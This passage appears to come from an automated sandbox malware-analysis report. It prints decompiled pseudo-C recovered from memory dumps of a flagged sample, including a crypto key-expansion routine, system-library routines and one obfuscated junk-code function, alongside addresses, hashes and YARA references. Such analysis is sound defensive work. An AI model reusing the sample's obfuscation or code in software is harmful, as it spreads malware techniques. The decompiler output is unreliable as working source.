0x01aa10a2
0x01aa10a4
0x01aa10a7
0x01aa10a9
0x01aa10ab
0x01aa10ab
0x01aa10ab
0x01aa10ae
0x01aa10ae
0x01aa10b6
0x01aa10b9
0x00000000
0x00000000
0x01aa10be
0x01aa10c1
0x01aa10c3
0x00000000
0x00000000
0x00000000
0x01aa10c3
0x01aa10c5
0x00000000
0x01aa10c5
0x01aa1097
0x01aa1050
0x01aa1053
0x01aa1056
0x01aa1059
0x01aa105c
0x01aa105e
0x01aa1060
0x01aa1062
0x01aa1064
0x01aa1064
0x01aa1062
0x01aa1066
0x01aa1069
0x01aa106b
0x01aa106d
0x01aa106f
0x01aa1076
0x01aa1076
0x01aa1076
0x00000000
0x01aa1076
0x01aa1071
0x01aa1074
0x00000000
0x00000000
0x00000000
0x01aa1074
0x01aa1079
0x01aa1079
0x01aa107b
0x01aa107b
0x01aa107f
0x01aa1082
0x01aa1085
0x00000000
0x01aa1085
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e64a46adbd665148597c2c79d8ef4029028fdefa501f38c3ca22d7ac3e58c8
Instruction ID: 01ceeb55ccbf24d5e22a8a6ab1b819d3d82b5e420e095a77946417c8e0966421
Opcode Fuzzy Hash: 83e64a46adbd665148597c2c79d8ef4029028fdefa501f38c3ca22d7ac3e58c8
Instruction Fuzzy Hash: 8871CE38A00762EBDB24CF5AC48067AB7F1FF44311FA8486EDA82CB240E775E955DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 019E52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E019E52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E019FEEF0(0x1ad79a0);
					_t104 =  *0x1ad8210; // 0x14c2ce8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E019FEB70(_t93, 0x1ad79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01A29890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E019FEEF0(0x1ad79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E019FEB70(0, 0x1ad79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x14c2cf5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E01A1F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E019FEEF0(0x1ad79a0);
									__eflags =  *0x1ad8210 - _t104; // 0x14c2ce8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1ad8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01A64888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E019FEB70(_t95, 0x1ad79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E01A295D0();
											L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E01A295D0();
											L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E019FEB70(_t93, 0x1ad79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E01A295D0();
										L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E01A295D0();
										L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E01A1F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x019e52a5
0x019e52ad
0x019e52b0
0x019e52b3
0x019e52b7
0x019e52ba
0x019e52bf
0x019e52c4
0x019e52cc
0x00000000
0x00000000
0x019e52ce
0x019e52d9
0x019e52dd
0x019e52e7
0x019e52f7
0x019e52f9
0x019e52fd
0x01a40dcf
0x01a40dd5
0x01a40dd6
0x01a40dd7
0x01a40dd8
0x01a40dd9
0x01a40dde
0x01a40ddf
0x01a40de0
0x01a40de1
0x01a40de2
0x01a40de5
0x01a40dea
0x01a40dec
0x01a40f60
0x01a40f64
0x01a40f70
0x01a40f76
0x01a40f79
0x01a40f79
0x00000000
0x01a40f64
0x01a40df2
0x01a40df7
0x01a40e04
0x01a40e0d
0x01a40e0d
0x01a40e10
0x01a40e1a
0x01a40e1c
0x01a40e4c
0x01a40e52
0x01a40e61
0x01a40e67
0x01a40e6b
0x01a40e70
0x01a40e76
0x01a40ed7
0x01a40edc
0x01a40ee0
0x01a40ee6
0x01a40eea
0x01a40eed
0x01a40ef0
0x01a40ef3
0x01a40ef6
0x01a40ef9
0x01a40efe
0x01a40f01
0x01a40f01
0x01a40f0b
0x01a40f12
0x01a40f16
0x01a40f18
0x01a40f1b
0x01a40f2c
0x01a40f31
0x01a40f31
0x01a40f35
0x01a40f39
0x01a40f3a
0x01a40f3c
0x01a40f3f
0x01a40f50
0x01a40f55
0x01a40f55
0x01a40f59
0x019e52eb
0x019e52f1
0x019e52f1
0x01a40e7d
0x01a40e84
0x01a40e88
0x01a40e8a
0x01a40e8d
0x01a40e9e
0x01a40ea3
0x01a40ea3
0x01a40ea7
0x01a40eaf
0x01a40eb3
0x01a40eb9
0x01a40eb9
0x01a40ebc
0x01a40ecd
0x01a40ecd
0x00000000
0x01a40eb3
0x01a40e21
0x01a40e2b
0x01a40e2f
0x01a40e30
0x01a40e3a
0x01a40e3f
0x01a40e41
0x00000000
0x00000000
0x01a40e47
0x00000000
0x01a40e47
0x01a40df9
0x01a40dfe
0x00000000
0x00000000
0x00000000
0x01a40dfe
0x019e5303
0x019e5307
0x00000000
0x019e5309
0x00000000
0x019e5309
0x019e5307
0x019e52e9
0x019e52e9
0x00000000
0x019e52e9
0x019e530e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12af8b094eba35b726d6d1357eb326831445d50c2cf3a5fe21916501c814867b
Instruction ID: ff01e7d128d52113fe6f8dcbbcaceebb027790640a99d182519a5eda98311f77
Opcode Fuzzy Hash: 12af8b094eba35b726d6d1357eb326831445d50c2cf3a5fe21916501c814867b
Instruction Fuzzy Hash: E5510F71205742AFE322DF68CA44B27BBE4FF90718F15091EF59A83651E770E804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0041C781, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E0041C781(signed char __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __esi) {
				signed char _t22;
				void* _t23;
				signed int _t32;
				signed int _t34;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				intOrPtr _t59;
				signed int _t63;

				_t50 = __esi;
				_t22 = __eax;
				 *0x16efa8e0 =  *0x16efa8e0 & __ecx;
				asm("adc [0xb4a0470c], dl");
				_t43 = __edx |  *0x5fc2ccec;
				_t34 = __ecx - 0x16d24939;
				asm("rcl byte [0x3ccdc486], 0xf0");
				 *0x32c1ddbd =  *0x32c1ddbd - __eax;
				_t59 =  *0xefa8e0cc;
				 *0xefa8e0cc =  *0xcc32c1de;
				_t54 = _t53 |  *0x93b70016;
				_t29 = __ebx - 0xc8;
				if(_t29 < 0) {
					L1:
					 *0x939ff7b7 =  *0x939ff7b7 << 0xe8;
				} else {
					asm("rol dword [0xaf88ac70], 0x2d");
					asm("ror byte [0xaddd0fb4], 0x33");
					__ebp =  *0xef45d88d;
					asm("adc [0x90e04c16], ecx");
					if(( *0x54942410 & __cl) > 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													goto L1;
												} while (_t34 ==  *0x8f83e7b0);
												 *0xdc624d74 = _t54;
												asm("rcl dword [0xc419e217], 0x9b");
												 *0x84e5c4bb =  *0x84e5c4bb | _t54;
												_t63 =  *0x84e5c4bb;
											} while (_t63 != 0);
											asm("sbb eax, [0xdd634e75]");
											_t2 = _t22;
											_t22 =  *0xaeb00218;
											 *0xaeb00218 = _t2;
										} while (_t63 >= 0);
										 *0xe77cd173 =  *0xe77cd173 << 0x44;
										asm("lodsb");
										_t22 = _t22 ^  *0xef4544a1;
										_push(0x2f9d1616);
										asm("adc ch, 0x32");
										 *0xefa8e0cc =  *0xefa8e0cc - _t54;
										asm("adc esi, 0x85c02c16");
										 *0xb2efca25 =  *0xb2efca25 - _t48;
										 *0xa8e0cc32 =  *0xa8e0cc32 + _t22;
										 *0xc6a616ef =  *0xc6a616ef & _t34;
										_t54 = _t54 + 1;
										_t48 = _t48 ^  *0xc1daa919;
										_t43 =  *0xa8e0cc32;
										asm("sbb ebp, 0xc83916ef");
									} while (_t48 != 0);
									_t54 = 0x997776;
									_t43 = 0xc68ff209;
									asm("adc esi, 0xe0cc32c1");
									_t48 = _t48 |  *0xc83816ef;
								} while (_t48 != 0);
								 *0x52173a7b = 0xc68ff209;
								_t23 = _t22 + 1;
								_push(_t23);
								 *0xef45d88d = _t50;
								asm("adc [0x81d04116], eax");
								 *0x4052173a =  *0x4052173a + _t29;
								_push(_t23);
								_push(0x81c42916);
								asm("sbb ch, 0x3a");
								 *0x9cba1d16 = _t34;
								asm("rcr dword [0x16ef45d8], 0xfd");
								asm("scasb");
								_t52 = _t50 ^  *0xef45d88d | 0x311087db;
								_push(0x997775);
								asm("rol byte [0x3d99a1e7], 0xf8");
								 *0x32ee16ef =  *0x32ee16ef << 0xa1;
								 *0x1db40ffd = 0xb4;
								asm("adc eax, [0xbe0b1c6d]");
								 *0xcc32c1ef =  *0xcc32c1ef >> 0xfb;
								 *0x16efa8e0 =  *0x16efa8e0 << 0x6a;
								 *0x17ff2f8a =  *0x9cba1d16 &  *0x8daddd0f;
								asm("adc edi, [0x32bfddbe]");
								_t7 = _t59;
								_t59 =  *0xefa8e0cc;
								 *0xefa8e0cc = _t7;
								_t54 = 0x883203 -  *0xc5f7c62b;
								_t22 =  *0x1db40ffd &  *0xa8e0cc32;
								_t43 =  *0x34f216ef;
								 *0x34f216ef = 0xc68ff209;
								asm("adc eax, [0xd9b004fa]");
								 *0xe0cc32b9 =  *0xe0cc32b9 - _t52;
								_t34 =  *0xc62116ef;
								_t29 = 0x1b;
								_t50 = _t52 &  *0x49395fc0;
								 *0xa2f716d2 =  *0xa2f716d2 >> 0xbf;
							} while ( *0xa2f716d2 <= 0);
							 *0xe2aa9076 =  *0xe2aa9076 ^ 0x00997775;
							_t45 = _t43 |  *0x395f828e;
							 *0xb36b616 = _t45;
							 *0xccebb814 =  *0xccebb814 >> 7;
							asm("ror byte [0xa8e0cc32], 0x52");
							 *0xe2a816ef = _t34 - 0x00000001 | 0x000000d2;
							asm("scasb");
							 *0xa8e0cc32 =  *0xa8e0cc32 << 0x10;
							_t32 = 0x1b -  *0xd79c0126;
							 *0xba16efa8 =  *0xba16efa8 >> 0x8e;
							asm("sbb cl, 0xf2");
							asm("sbb ebp, [0x395fc3cc]");
							asm("adc ch, [0x420816d2]");
							_t48 = 0xf9af869a -  *0xf2c1ab9c;
							asm("adc edi, [0xe0cc32ba]");
							_t34 =  *0xbda7983e;
							 *0xbda7983e =  *0xe2a816ef -  *0xe0cc32c1 - 1;
							_t50 = _t50 | 0x16d24939;
							 *0x71c621c = _t45 ^ 0x5fbed3f5;
							asm("movsb");
							 *0xcc32c1db =  *0xcc32c1db & _t32;
							_t29 = _t32 -  *0x16efa8e0;
							asm("ror dword [0x7c73a2fe], 0x4");
							 *0xc4a8009a = _t59;
							_t43 =  *0x71c621c | 0x000000a8;
							 *0x16ef45d8 =  *0x16ef45d8 << 0x92;
							_push( *0x9ba0f4be);
							asm("adc cl, 0xb4");
							 *0x5fa899d1 =  *0x5fa899d1 |  *0x71c621c | 0x000000a8;
							_t59 =  *0xc4a8009a -  *0x16d24939;
						} while (_t59 != 0);
						return _t22;
					} else {
						 *0xa8008977 =  *0xa8008977 - __ebp;
						_pop( *0x45d8a8c4);
						asm("adc eax, 0x9e3f16ef");
						asm("sbb eax, 0xf9e2bc0");
						 *0x8f16ef88 =  *0x8f16ef88 >> 0x7c;
						asm("sbb bl, 0x0");
						__al = __al +  *0xd8a8c4a8;
						__ebp = __ebp + 1;
						__ecx = __ecx | 0x121f16ef;
						__ebp = 0x40ecb2a1;
						__dl = __dl -  *0x4b16ef88;
						 *0xcc319fe2 =  *0xcc319fe2 << 0x66;
						 *0x5fc2ccf0 =  *0x5fc2ccf0 << 0x5f;
						 *0x16d24939 =  *0x16d24939 | __eax;
						__ecx = __ecx -  *0x2e339416;
						return __eax;
					}
				}
			}

0x0041c781
0x0041c781
0x0041c787
0x0041c78d
0x0041c796
0x0041c79c
0x0041c7a2
0x0041c7a9
0x0041c7af
0x0041c7af
0x0041c7b5
0x0041c7bb
0x0041c7bc
0x0041c515
0x0041c515
0x0041c7c2
0x0041c7c2
0x0041c7d6
0x0041c7dd
0x0041c7e3
0x0041c7e9
0x00000000
0x0041c515
0x0041c515
0x0041c515
0x0041c515
0x0041c515
0x0041c515
0x0041c515
0x00000000
0x00000000
0x0041c524
0x0041c52a
0x0041c531
0x0041c531
0x0041c531
0x0041c53a
0x0041c540
0x0041c540
0x0041c540
0x0041c540
0x0041c548
0x0041c54f
0x0041c550
0x0041c556
0x0041c561
0x0041c564
0x0041c56a
0x0041c570
0x0041c576
0x0041c57c
0x0041c582
0x0041c583
0x0041c589
0x0041c58f
0x0041c58f
0x0041c5a7
0x0041c5ae
0x0041c5b4
0x0041c5bd
0x0041c5bd
0x0041c5c9
0x0041c5cf
0x0041c5d0
0x0041c5d1
0x0041c5d7
0x0041c5dd
0x0041c5e3
0x0041c5ea
0x0041c5ef
0x0041c5fe
0x0041c60d
0x0041c614
0x0041c615
0x0041c61b
0x0041c61c
0x0041c624
0x0041c62b
0x0041c63d
0x0041c643
0x0041c64a
0x0041c651
0x0041c657
0x0041c65d
0x0041c65d
0x0041c65d
0x0041c669
0x0041c66f
0x0041c675
0x0041c675
0x0041c67b
0x0041c681
0x0041c689
0x0041c68f
0x0041c698
0x0041c69e
0x0041c69e
0x0041c6ab
0x0041c6b1
0x0041c6bb
0x0041c6c1
0x0041c6c8
0x0041c6cf
0x0041c6db
0x0041c6dc
0x0041c6e9
0x0041c6f5
0x0041c6fc
0x0041c704
0x0041c70b
0x0041c711
0x0041c717
0x0041c723
0x0041c723
0x0041c72f
0x0041c735
0x0041c73b
0x0041c73c
0x0041c742
0x0041c748
0x0041c74f
0x0041c755
0x0041c758
0x0041c75f
0x0041c765
0x0041c768
0x0041c76e
0x0041c76e
0x0041c780
0x0041c7ef
0x0041c7ef
0x0041c7f5
0x0041c7fb
0x0041c800
0x0041c80b
0x0041c818
0x0041c81b
0x0041c821
0x0041c822
0x0041c82d
0x0041c832
0x0041c838
0x0041c83f
0x0041c846
0x0041c84c
0x0041c852
0x0041c852
0x0041c7e9

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579d1ce7777431b2fa414448beeb460156e905062d6a91a3e8fe6e7105e4870d
Instruction ID: 1b4195be0fa68af94469a7e46d26130fefa88fc2a6d08524347fa61d946a38a3
Opcode Fuzzy Hash: 579d1ce7777431b2fa414448beeb460156e905062d6a91a3e8fe6e7105e4870d
Instruction Fuzzy Hash: A88121329493D1DFEB02DF78D8996463FB1F742324B48079ECAA1572D2C77421A6CB85

Uniqueness

Uniqueness Score: -1.00%

Function 01A12AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A12AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1ad8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1ad8208; // 0x1ad8207
				_t8 = _t57 + 0x1ad8208; // 0x1ad8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1ad8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x1ad821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1ad6d5c; // 0x7ff70654
							_t72 =  *0x1ad6d5c; // 0x7ff70654
							_t75 =  *0x1ad6d5c; // 0x7ff70654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1ad6d5c; // 0x7ff70654
							_t84 =  *0x1ad6d5c; // 0x7ff70654
							_t87 =  *0x1ad6d5c; // 0x7ff70654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E01A2F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01a12ae4
0x01a12aec
0x01a12aef
0x01a12af4
0x01a12af7
0x01a12afd
0x01a12b92
0x01a12b92
0x01a12b97
0x01a12b9c
0x01a12b9c
0x01a12b03
0x01a12b06
0x01a12b09
0x01a12b09
0x01a12b0f
0x01a12b15
0x01a12b15
0x01a12b1b
0x01a12b1e
0x01a12b21
0x01a12b26
0x01a12b29
0x01a12b81
0x01a12b84
0x01a12c0e
0x01a12c15
0x01a12c24
0x01a12c24
0x01a12b8a
0x01a12b8a
0x01a12b8a
0x01a12b8a
0x01a12b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01a12b4a
0x01a12b4a
0x01a12b4d
0x01a12b53
0x00000000
0x00000000
0x01a12b55
0x01a12b58
0x01a12bb7
0x01a55d1b
0x01a55d37
0x01a55d47
0x01a55d53
0x01a12bbd
0x01a12bbd
